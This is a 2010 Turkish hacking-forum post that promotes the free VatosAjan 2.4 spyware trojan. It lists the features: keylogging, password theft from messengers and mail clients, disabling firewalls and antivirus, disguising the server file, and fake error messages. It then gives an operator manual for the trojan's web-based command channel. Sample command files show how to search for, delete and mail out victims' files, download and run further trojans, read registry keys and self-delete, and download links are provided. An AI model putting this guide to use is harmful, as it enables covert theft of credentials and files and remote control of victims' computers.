İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

vatos ajan 24 anlatim

10-09-2010 23:15
#1
MıCHeLLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2010
Mesajlar:
181
Teşekkür (Etti):
1
Teşekkür (Aldı):
75
Konular:
138
VatosAjan 2.4 Hakkında;
VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen,Sadece VatosAjan'da bulunan
WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında
dosya arama,dosya silme,istediğiniz dosyaları mailinize gönderme,
downloader gibi çalışıp, istediğiniz dosyaları internetten indirip çalıştırabilme,
mail adresinizi değiştirebilme,registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
VatosAjanın alabildiği şifreler aşağıda yazılmıştır.

Versiyon Farkları
-Win9x sistemlerde stabil çalışması sağlandı
-FTP Server eklendi
-Server ve serverin kullandığı dosyalar disk üzerinde gizlendi
-Server Boyutunun küçülmesi amacıyla kullanılan componentler değiştirildi
-Firewall ve Antivüslerin kapatılması sağlandı
-Web Kontrol için firewall By Pass edildi
-Servere ayar işleme yöntemi değiştirildi
-Serverin başka bir dosya ile birleşince simgesinin korunması sağlandı
-İlk Çalıştırılma esnasında sahte hata uyarısı verebilme özelliği eklendi
-icon seçim yöntemi değiştirildi.Böylece kendi iconlarınızı da kullanabileceksiniz.
-Server Uzantısını değiştirebilme imkanı eklendi
-Client görünümü ve logo değiştirildi
-Türkçe ve İngilizce Dil Seçeneği eklendi


VatosAjanın en Can alıcı Özelliği olan Web Kontrol Kullanımı:
Şu anda VatosAjan'a 7 adet emir verebilirsiniz.
Emir verebilmek için kurbanın bilgisayar adı ile (gelen maillerde Bilgisayar adı yazıyor)
bir *.txt dosya oluşturun.(örnek:Bilgisayar Adı vatos ise oluturacağınız dosyanın adı vatos.txt olacak.)
şimdi server oluştururken yazdığımız web sitenize upload edin bu txt dosyayı
web site adresiniz http://www.sizinsiteniz.com/kontrol/ olsun kurbanın pc adı.txt(örnek: vatos.txt) dosyasını
gönderdiğinizde adresi şöyle olmalı
http://www.sizinsiteniz.com/kontrol/vatos.txt
VatosAjan 4 dakikada bir emir kontrolü yapar, yeni emrinizi görürse hemen vazifeye başlar.
Şimdi gelelim ajanımıza yaptırabileceklerinize:


Emirler:
1)Ara:serverin bulunduğu pc de istediğiniz uzantıdaki dosyaları arar ve listesini
mail adresinize yollar.Kullanımı:
1. satıra ara (yani emrimiz.)
2.satıra arayacağınız dosya uzantısı örnek:*.xls
Yani vatos.txt dosyamız şu şekilde olacak
Örnek kullanım
ara
*.xls
2)Dosyasil:Kurbanın bilgisayarından tam yolunu verdiğiniz dosyayı siler.Yine kurbanınPcAdı.txt dosyasını
webe gönderin.Tüm emirler için bu işlem yapılacak zaten...
1.satıra dosyasil (yani emrimiz.)
Alt satırlara ise silinmesini istediğiniz dosyaların tam dizinini yazınız.
Örnek kullanım
dosyasil
c:\belgelerim\resim.jpg
c:\belgelerim\ozel.xls
d:\sirket\hesaplar.xls
d:\dosyalar\program.exe
3)Gönder:İşte webden kontrolün en can alıcı yanı.Kurbanın bilgisayarındaki istediğiniz dosyaları
mailinize göndermesini sağlayabilirsiniz
1.satıra gonder (yani emrimiz.)
Alt satırlara ise gelmesini istediğiniz dosyaların kurbanın bilgisayarındaki tam yollarını yazacaksınız.
Anlayacağınız üzere birden fazla dosya isteyebilirsiniz.
Örnek Kullanım
gonder
c:\belgelerim\resim.jpg
c:\belgelerim\ozel.xls
d:\sirket\hesaplar.xls
d:\dosyalar\program.exe
4)IndirVeCalistir: Ajanımız remote downloader olarak da görev yapabiliyor.Kurbanı sevdiniz ve bir de trojan yüklemeye
karar verdiniz.VatosAjana dosyanın yerini söyleyin yeter
txt dosyamıza
1.satıra IndirVeCalistir (yani emrimiz.)
2.satıra yükleyeceğiniz dosyanın web adresi
Örnek Kullanım
IndirVeCalistir
http://members.lycos.co.uk/vatosajan/VatosAjan.exe
5)Kendinisil:Kurbandan gelen mailler ilginizi çekmiyorsa veya artık işinizin bittiğini düşünüyorsanız VatosAjan'a
emir verin kendini imha etsin.
Örnek Kullanım
kendinisil
6)Mail:Mail emri ile serverde kayıtlı mail adresinizi değiştirebilirsiniz.
txt dosyamıza
1. satıra mail (yani emir)
2.Satıra mail adresiniz
Örnek Kullanım
mail
vatosajan@yahoo.com
7)Registry:Bu emri özellikle bilgi düzeyi yüksek arkadaşlar için tasarladım.Bu emir ile istediğiniz registry
bilgilerine kolaylıkla ulaşabileceksiniz.Ne amaçla kullanılabileceği hususunda
bir kaç örnek vermek istiyorum. Örnek 1: Kurbanınız DelphiTürk Codebank kullanıyorsa kullanıcı adı ve şifresini çok kolay bir şekilde alabilirsiniz.
Tek bilmeniz gereken registry de hangi anahtarda olduğu.
Örnek 2: Kurbanınızın Başka bir trojan serveri daha yediğini anladınız.O trojanın server şifresinin kayıtlı
olduğu anahtara bakarak şifreyi dolayısıyla da serveri ele geçirebilirsiniz.
Örnek 3:Otomatik Başlayan programların isimlerini alabilirsiniz.
Örnek 4:İlginizi çeken ücretli Programların lisans numaralarını alabilirsiniz.

Sanırım bu kadar örnek yeter.Sıra geldi kullanımını açıklamaya.
txt dosyamıza
1. satıra registry (yani emir)
2. satıra rootkey adı (mesela: HKEY_LOCAL_MACHINE)
3. satıra bilgileri görmek istediğiniz registry anahtarının adı,

Örnek Kullanım
registry
HKEY_LOCAL_MACHINE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Örnek kullanım için dosyalar VatosAjan.zip içerisinde bulunmaktadır.

Ücretsizdir.
Download adresi:
http://www.websamba.com/vatosajan/VatosAjan.zip
Yardım ve desteğinden dolayı ATmaCA'ya Teşekkür Ederim.

///////Alınabilen Şifreler\\\\\\\\\\\
# MSN Messenger
# Windows Messenger (In Windows XP)
# Yahoo Messenger (Versions 5.x and 6.x)
# ICQ Lite 4.x/2003
# AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
# AOL Instant Messenger/Netscape 7
# Trillian
# Miranda
# GAIM
# Outlook Express
# Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
# Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts)
# IncrediMail
# Eudora
# Netscape 6.x/7.x
# Mozilla Thunderbird
# Group Mail Free
# Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
# Hotmail/MSN mail - If the password is saved in MSN Messenger application.
# Gmail
#Otomatik tamamlanan Internet Explorer şifreleri,
#MSN Explorer Şifreleri,


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı